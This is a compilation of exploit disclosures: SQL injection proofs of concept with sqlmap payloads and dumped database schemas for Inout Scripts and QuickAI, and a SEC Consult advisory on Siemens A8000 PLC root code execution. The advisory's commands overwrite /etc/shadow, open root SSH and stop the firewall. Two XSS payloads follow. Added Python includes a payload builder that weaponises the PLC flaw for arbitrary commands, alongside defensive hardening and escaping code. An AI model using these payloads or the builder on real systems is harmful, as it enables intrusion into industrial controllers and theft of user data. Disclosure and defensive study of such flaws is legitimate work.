<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-blockchain-easypayments/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Blockchain EasyPayments 1.0.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php/payment/getcoinaddress<br /><br /><br />----------------------------------------------------------------------------<br />POST /index.php/payment/getcoinaddress HTTP/2<br /><br />coinid=[SQLI]&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000<br />----------------------------------------------------------------------------<br /><br />POST parameter 'coinid' is vulnerable to SQL Injection<br /><br />---<br />Parameter: coinid (POST)<br /> Type: boolean-based blind<br /> Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace<br /> Payload: coinid=(SELECT (CASE WHEN (08758=8758) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: coinid=(SELECT(0)FROM(SELECT(SLEEP(5)))a)&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: '*****_blockchain_easypayments_**'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Blockchain AltExchanger 2.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /application/third_party/Chart/TradingView/chart_content/master.php/history<br /><br />https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203<br /><br />GET parameter 'symbol' is vulnerable to SQL Injection<br /><br />---<br />Parameter: symbol (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: symbol=ZRX-BTC') AND 06585=6585<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: '*****_blockchain_altexchanger_***'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://quickai.bylancer.com/ │<br />│ Vendor : bylancer │<br />│ Software : QuickAI OpenAI 3.8.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=123') OR 08039=8039 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickai_**'<br /><br /><br />fetching tables<br /><br />[47 tables]<br />+----------------------------+<br />| qa_faq_entries |<br />| qa_text_to_speech_used |<br />| qa_user_options |<br />| qa_ai_images |<br />| qa_logs |<br />| qa_orders |<br />| qa_adsense |<br />| qa_ai_speeches |<br />| qa_word_used |<br />| qa_ai_templates |<br />| qa_blog |<br />| qa_api_keys |<br />| qa_ai_chat_prompts |<br />| qa_blog_comment |<br />| qa_subscriber |<br />| qa_post_options |<br />| qa_admins |<br />| qa_transaction |<br />| qa_plans |<br />| qa_languages |<br />| qa_speech_to_text_used |<br />| qa_countries |<br />| qa_upgrades |<br />| qa_ai_template_categories |<br />| qa_affiliates |<br />| qa_image_used |<br />| qa_plan_options |<br />| qa_options |<br />| qa_blog_categories |<br />| qa_prepaid_plans |<br />| qa_ai_custom_templates |<br />| qa_payments |<br />| qa_user |<br />| qa_ai_documents |<br />| qa_withdrawal |<br />| qa_balance |<br />| qa_ai_chat_bots |<br />| qa_taxes |<br />| qa_time_zones |<br />| qa_currencies |<br />| qa_testimonials |<br />| qa_ai_chat |<br />| 
qa_blog_cat_relation |<br />| qa_pages |<br />| qa_ai_chat_conversations |<br />| qa_ai_chat_bots_categories |<br />| qa_post |<br />+----------------------------+<br /><br /><br />fetching columns for Table: qa_user<br /><br />[49 columns]<br />+----------------+<br />| id |<br />| group_id |<br />| username |<br />| user_type |<br />| balance |<br />| password_hash |<br />| forgot |<br />| confirm |<br />| email |<br />| status |<br />| view |<br />| created_at |<br />| updated_at |<br />| name |<br />| tagline |<br />| description |<br />| dob |<br />| salary_min |<br />| salary_max |<br />| category |<br />| subcategory |<br />| website |<br />| sex |<br />| phone |<br />| postcode |<br />| address |<br />| country |<br />| city |<br />| city_code |<br />| state_code |<br />| country_code |<br />| image |<br />| lastactive |<br />| facebook |<br />| twitter |<br />| googleplus |<br />| instagram |<br />| linkedin |<br />| youtube |<br />| oauth_provider |<br />| oauth_uid |<br />| oauth_link |<br />| online |<br />| notify |<br />| notify_cat |<br />| currency |<br />| referral_key |<br />| referred_by |<br />| menu_layout |<br />+----------------+<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230703-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities including Unauthenticated RCE<br /> product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)<br /> Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)<br /> vulnerable version: <= V04.92<br /> fixed version: CPCI85 V05<br /> CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920,<br /> CVE-2023-33921<br /> impact: Critical<br /> homepage: https://www.siemens.com<br /> found: 2023-02-15<br /> by: Stefan Viehböck (Office Vienna)<br /> Christian Hager (Office Vienna)<br /> Steffen Robertz (Office Vienna)<br /> Gerhard Hechenberger (Office Vienna)<br /> Gorazd Jank (Office Vienna)<br /> Constantin Schieber-Knoebl (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We are a technology company focused on industry, infrastructure,<br />transport, and healthcare. 
From more resource-efficient factories,<br />resilient supply chains, and smarter buildings and grids, to cleaner<br />and more comfortable transportation as well as advanced healthcare,<br />we create technology with purpose adding real value for customers."<br /><br />Source: https://new.siemens.com/global/en/company/about.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch that should be installed immediately.<br />Customers should update to CPCI85 V05 or a later version.<br />(https://support.industry.siemens.com/cs/ww/en/view/109804985/)<br /><br />SEC Consult highly recommends performing a thorough security review of<br />the product, conducted by security professionals, to identify and resolve<br />further potential security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Unauthenticated Remote Code Execution (CVE-2023-28489)<br />By sending an HTTP request with a crafted header to port 80/443 of<br />the PLC, arbitrary commands can be executed as the root (system) user<br />without any authentication. The port is used to configure and control<br />Siemens PLCs with the Siemens Toolbox II application and is typically<br />accessible on such devices.<br /><br />2) Authenticated Command Injection (CVE-2023-33919)<br />Due to missing server-side input sanitization, any user with access to<br />the SICAM WEB interface can execute arbitrary commands as user "root"<br />on the device. This works by setting malicious parameters and starting<br />an Ethernet packet capture.<br /><br />3) Hard-coded Root Password (CVE-2023-33920)<br />The PLC contains a hard-coded "root" user password hash. This<br />password hash is the same on all devices. 
If the corresponding<br />password is known, it can be used to log in via UART and SSH.<br /><br />4) Console Login via UART (CVE-2023-33921)<br />The UART interface can be accessed with physical access to the PCB.<br />After connecting to the interface, boot information is printed and a<br />login prompt is provided. Login as the "root" user is possible after<br />changing the hard-coded "root" password hash (see 1, 2 and 3).<br /><br /><br />Proof of concept:<br />-----------------<br />1) Unauthenticated Remote Code Execution (CVE-2023-28489)<br />To exploit this vulnerability, an HTTP request including the command<br />must be crafted. No "/" characters can be used, therefore commands<br />are encoded as base64, e.g., "id" as "aWQ=". The command must be<br />provided in the UPLOADFILENAME header. A full command looks as follows:<br /><br />;echo aWQ=| base64 -d | sh #<br /><br />The following headers must be present:<br />* User-Agent: SICAM TOOLBOX II<br />* Session-ID: [ARBITRARY 16 CHARACTERS]<br />* UPLOADFILENAME: [COMMAND]<br /><br />Additionally, the request body must contain the following POST parameters:<br />* type=20<br />* length=[ARBITRARY]<br />* data=[ARBITRARY]<br /><br />A valid request can be seen below:<br />-----------------------------------------------------------------------<br />[ POC request removed ]<br />-----------------------------------------------------------------------<br /><br />If it worked, the response body will be "type=21". Additionally, the<br />output on the UART interface indicates code execution as the root user:<br />-----------------------------------------------------------------------<br />base64: /ies/IN/_: No such file or directory<br />uid=0(root) gid=0(root)<br />-----------------------------------------------------------------------<br /><br />Subsequently, the SSH port can be opened by sending the following<br />commands separately, each encoded as a base64 string. 
They will replace<br />the default root password hash with the hash of an empty password,<br />reconfigure the Dropbear SSH daemon (dropping the -s and -g options,<br />which disable password logins in general and for root respectively)<br />and stop the firewall:<br />-----------------------------------------------------------------------<br />sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMgre5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow<br />sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear<br />/etc/init.d/dropbear restart<br />/etc/init.d/rc.firewall stop<br />-----------------------------------------------------------------------<br /><br />After this, login via SSH as root is possible:<br />-----------------------------------------------------------------------<br />ssh root@[IP]<br />root@[IP]'s password:<br />~# id<br />uid=0(root) gid=0(root) groups=0(root),10(wheel)<br />~#<br />-----------------------------------------------------------------------<br /><br /><br />2) Authenticated Command Injection (CVE-2023-33919)<br />To trigger the command injection vulnerability, the payload must be set in<br />the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation"<br />-> "Ethernet Packet Capture", section "Capture configuration"<br />(other fields may also be affected).<br />As the web interface only provides a drop-down menu, the payload must<br />be set by manipulating the JavaScript logic or by directly manipulating<br />the HTTP request as below, where "ping [IP]\nBBBBBBB" was set:<br /><br />-----------------------------------------------------------------------<br />POST /sicweb-ajax/rtum85/cview HTTP/1.1<br />Host: [HOST]<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/xml<br />SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT<br />Content-Length: 198<br />Origin: http://[HOST]<br />Connection: close<br />Referer: http://[HOST]/<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"><br /><value><br />ping [IP]<br />BBBBBBB</value><br /></parameter></view></Cmd_SetCustomViewValue><br />-----------------------------------------------------------------------<br /><br />The line break in the payload is essential: the value is written into a<br />shell script, so everything after the newline is executed as a command<br />of its own.<br />This script is generated and executed by pressing the "Start/Stop trace"<br />button in the "Capture Controlling" section and saved as<br />/tmp/incws_tcpdump.sh. An excerpt with the injected command is shown<br />below:<br /><br />-----------------------------------------------------------------------<br />[...] # lets start tcpdump<br />tcpdump -i<br />ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap &<br />[...]<br />-----------------------------------------------------------------------<br /><br />The executed script creates a process running as the root user, which can<br />be seen by running "ps" on the device:<br /><br />-----------------------------------------------------------------------<br />root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit<br />root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json<br />[...]<br />www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf<br />root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh<br />root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP]<br />-----------------------------------------------------------------------<br /><br /><br />3) Hard-coded Root Password (CVE-2023-33920)<br />A hard-coded "root" user password hash can be found in the /etc/shadow<br />file:<br />-----------------------------------------------------------------------<br />root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMgre5P14Kv2zAH1:16436:0:99999:7:::<br />-----------------------------------------------------------------------<br /><br /><br />4) Console Login via UART (CVE-2023-33921)<br />The serial console (UART) can be accessed on the back side of the PCB<br />via two vias. After removing an additional logic IC, data can be<br />received and sent with the following UART settings:<br />* Voltage: 3.3V<br />* Speed: 115200 baud<br />* Framing: 8 data bits, no parity, 1 stop bit (8N1)<br />Extensive boot log output can be received. Some output is shown below:<br />-----------------------------------------------------------------------<br />U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02)<br />BOARD : Altera SOCFPGA Cyclone V Board<br />CLOCK: EOSC1 clock 50000 KHz<br />[...]<br />Starting IES system<br />-----------------------------------<br />Welcome to SICAM IES<br />-----------------------------------<br /><br />Welcome to<br /> _______. __ ______ ___ .___ ___.<br /> / || | / | / \ | \/ |<br /> | (----`| | | ,----' / ^ \ | \ / |<br /> \ \ | | | | / /_\ \ | |\/| |<br />.----) | | | | `----./ _____ \ | | | |<br />|_______/ |__| \______/__/ \__\ |__| |__| RTUs<br /><br />[...]<br />sicam login:<br />-----------------------------------------------------------------------<br /><br />Additionally, a console login form is displayed. 
Login is possible if<br />the password for the set "root" user password hash (see 3) is known.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following products have been tested:<br />* Siemens A8000 CP-8050 04.92<br />* Siemens A8000 CP-8031 04.92<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-03-14: Contacting vendor through productcert@siemens.com, sending<br /> encrypted advisory<br />2023-03-29: Naming researchers involved<br />2023-03-31: Requesting status. Vulnerability 1 will be published first<br /> due to criticality. The rest will follow.<br />2023-04-11: Siemens releases advisory for unauthenticated RCE<br /> (Vulnerability 1, CVE-2023-28489)<br />2023-06-13: Siemens releases advisory for vulnerabilities 2, 3 and 4<br /> (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921)<br />2023-06-21: Siemens has additional feedback regarding the contents of the<br /> advisory.<br />2023-07-03: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update to firmware CPCI85 V05 or a later version, see the vendor advisories<br />for further information:<br />https://cert-portal.siemens.com/productcert/html/ssa-472454.html<br />https://cert-portal.siemens.com/productcert/html/ssa-731916.html<br /><br /><br />Workaround:<br />-----------<br />Restrict network access to the A8000 CP-8050/CP-8031 module or disable the<br />Toolbox II communication on port 80/443. 
Make sure to strictly limit<br />physical access to the PLC during and also after its life cycle.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger,<br />Gorazd Jank, Constantin Schieber-Knoebl / @2023<br /><br /></code></pre>
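<p>The encoding step in section 1 of the SEC Consult advisory above deserves a closer look: the header value may not contain "/", so the command is wrapped as ";echo &lt;base64&gt;| base64 -d | sh #". The standard base64 alphabet itself contains "/", though, so a longer command (the sed line against /etc/shadow, for instance) can encode to text that still violates the rule. The Python below is an added example, not part of the advisory: it builds the wrapper exactly as the advisory shows it, detects the "/" case, and in that case falls back to URL-safe base64 with tr restoring the "/" on the target through an octal escape. That fallback is this example's own addition and assumes a tr that understands \NNN escapes (GNU and BusyBox tr do), which the advisory does not confirm for the device.</p>

```python
import base64
import re

# Wrapper as shown in the advisory: echo the base64 text, decode it, pipe it into
# sh; the trailing "#" comments out whatever the server appends to the header value.
PLAIN = ";echo {b64}| base64 -d | sh #"
# Fallback used only when the standard encoding contains "/": URL-safe base64
# ("_" in place of "/") with tr restoring the "/" via the octal escape \057.
# This fallback is the example's own addition; it assumes the target's tr
# understands \NNN escapes (GNU and BusyBox tr do), which the advisory does not state.
WITH_TR = ";echo {b64}| tr _ '\\057' | base64 -d | sh #"


def build_payload(command: str) -> str:
    """Return a "/"-free UPLOADFILENAME value that makes the target run `command`."""
    raw = command.encode()
    b64 = base64.b64encode(raw).decode()
    if "/" not in b64:
        return PLAIN.format(b64=b64)
    # urlsafe_b64encode maps "+" -> "-" and "/" -> "_"; only the second mapping
    # is wanted, so put "+" back and let tr on the target undo the first.
    b64url = base64.urlsafe_b64encode(raw).decode().replace("-", "+")
    return WITH_TR.format(b64=b64url)


def decode_payload(payload: str) -> str:
    """Local model of the target's pipeline: recover the command a payload carries
    and refuse anything that violates the no-"/" rule the advisory describes."""
    if "/" in payload:
        raise ValueError("payload contains '/', which the target rejects")
    m = re.fullmatch(r";echo (\S+)\| (tr _ '\\057' \| )?base64 -d \| sh #", payload)
    if not m:
        raise ValueError("not a payload produced by build_payload")
    b64 = m.group(1).replace("_", "/") if m.group(2) else m.group(1)
    return base64.b64decode(b64).decode()
```

decode_payload exists only to check the builder offline; on a real engagement the check is the "type=21" response and the uid=0 line on the UART console that the advisory describes.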
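<p>Section 2 of the advisory works because the "LAN port group" value is written straight into the generated /tmp/incws_tcpdump.sh, so a newline inside it starts a second shell command. The example below is added here and is not the device's code: the script template is reconstructed from the excerpt in the advisory (the exact line on which the injected text lands depends on the real generator; the effect does not), and it puts a generator with that flaw next to one that validates the value against the shape of a Linux interface name and shell-quotes it anyway. A small splitter shows which commands sh would see in each case.</p>

```python
import re
import shlex

# Script template reconstructed from the /tmp/incws_tcpdump.sh excerpt in the
# advisory; the capture filter is the sample one shown there.
FILTER = "(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)"
TEMPLATE = (
    "# lets start tcpdump\n"
    "tcpdump -i {iface} '{filter}' -C 1 -W 4 -U -w /var/log/wireshark.pcap &\n"
)
# Linux interface names are at most 15 characters and never contain "/" or
# whitespace; this allowlist is deliberately stricter than the kernel's rules.
IFACE_RE = re.compile(r"[A-Za-z0-9_.:-]{1,15}")


def vulnerable_script(iface: str) -> str:
    """The flaw: the submitted 'LAN port group' value is interpolated verbatim."""
    return TEMPLATE.format(iface=iface, filter=FILTER)


def hardened_script(iface: str) -> str:
    """Reject anything that is not an interface name, then quote it regardless:
    even if the allowlist were loosened later, a quoted value is one argument."""
    if not IFACE_RE.fullmatch(iface):
        raise ValueError(f"not an interface name: {iface!r}")
    return TEMPLATE.format(iface=shlex.quote(iface), filter=FILTER)


def commands_in(script: str) -> list:
    """Split a script into commands roughly as sh does: on newlines and ';'
    outside quotes, skipping comment lines (enough for this demonstration)."""
    cmds, cur, quote = [], "", None
    for ch in script:
        if quote:
            cur += ch
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote, cur = ch, cur + ch
        elif ch in "\n;":
            cmds.append(cur.strip())
            cur = ""
        else:
            cur += ch
    cmds.append(cur.strip())
    return [c for c in cmds if c and not c.startswith("#")]


def foreign_commands(script: str) -> list:
    """Commands in the generated script whose program is not tcpdump."""
    return [c for c in commands_in(script) if c.split()[0] != "tcpdump"]
```

The allowlist is the real fix; shlex.quote is defence in depth. Rejecting the value server-side matters because, as the advisory notes, the drop-down in the web UI is no control at all once the XML request is edited directly.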
<pre><code># Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://decapcms.org/docs/intro/<br /># Software Link: https://github.com/decaporg/decap-cms<br /># Version: 2.10.192<br /># Tested on: https://cms-demo.netlify.com<br /><br /><br />Description:<br /><br />1. Open "New Post" in the posts collection and put the payload in the body field:<br /><br />https://cms-demo.netlify.com/#/collections/posts<br /><br />Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe><br /><br />2. After the post is saved, the XSS payload executes and an alert box appears.<br /><br />The &Tab; entities are decoded by the HTML parser and the resulting tab<br />characters are dropped when the browser parses the URL, so the src is<br />javascript:alert(); a filter that looks for the literal string "javascript:"<br />in the raw markup does not see it.<br /></code></pre>
<pre><code># Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: None<br /># Version: 5<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36163<br /><br />#PoC:<br />The vulnerable parameter is mc=. Its value is reflected into the page unencoded,<br />so JavaScript can be injected with a value such as:<br />'><script>prompt("XSS");</script><div id="aa<br /><br />The attacker sends the full URL carrying this value to a victim; the script<br />runs in the victim's browser when the link is opened.<br /><br />#Payload:<br />company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa<br /></code></pre>
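<p>The two XSS entries above hinge on output context, and their payloads need different defences. The Python below is an added example, not code from either product: it shows a string-matching filter letting the Netlify CMS iframe src through, the normalisation that catches it (HTML entity decoding, then the tab/newline stripping browsers apply to URLs, then a scheme check), and, for the BuildaGate reflection, why attribute-context escaping with html.escape stops a payload that closes the attribute. The two payloads are taken from the entries; the input element used for the reflection is assumed.</p>

```python
import html
import re

# Payload from the Netlify CMS entry: HTML entities hide the scheme from a string match.
IFRAME_SRC = "java&Tab;sc&Tab;ript:al&Tab;ert()"
# Payload from the BuildaGate entry: closes the attribute and the tag it is reflected into.
MC_VALUE = "aaa'><script>prompt(\"XSS\");</script><div id=\"aaaa"

DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def naive_src_is_safe(src: str) -> bool:
    """A string-matching filter on the raw attribute text; fooled by &Tab;."""
    return not src.lower().startswith("javascript:")


def url_scheme(src: str) -> str:
    """Determine the scheme the way a browser will see it:
    1. decode HTML entities in the attribute value (&Tab; -> U+0009),
    2. strip leading/trailing C0 controls and spaces (URL Standard),
    3. drop ASCII tab, LF and CR wherever they appear (URL Standard),
    4. the scheme is what precedes the first ':' (case-insensitive)."""
    s = html.unescape(src).strip(C0_AND_SPACE)
    s = re.sub(r"[\t\n\r]", "", s)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", s)
    return m.group(1).lower() if m else ""


def src_is_safe(src: str) -> bool:
    """Scheme check after normalisation; relative URLs have no scheme and pass."""
    return url_scheme(src) not in DANGEROUS_SCHEMES


def render_mc_vulnerable(mc: str) -> str:
    """Reflect the parameter into an attribute verbatim (the BuildaGate flaw);
    the input element is an assumed stand-in for the real page."""
    return f"<input type='hidden' name='mc' value='{mc}'>"


def render_mc_fixed(mc: str) -> str:
    """quote=True escapes ' and " as well as <, > and &: the value cannot leave the attribute."""
    return f"<input type='hidden' name='mc' value='{html.escape(mc, quote=True)}'>"


def tag_count(markup: str) -> int:
    """Number of tag openers in the markup; a successful reflection adds some."""
    return len(re.findall(r"<[A-Za-z/]", markup))
```

Escaping and scheme validation are not interchangeable: html.escape leaves "javascript:alert()" untouched because it contains nothing to escape, and a scheme check does nothing for a value that breaks out of an attribute. Each context gets its own control.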
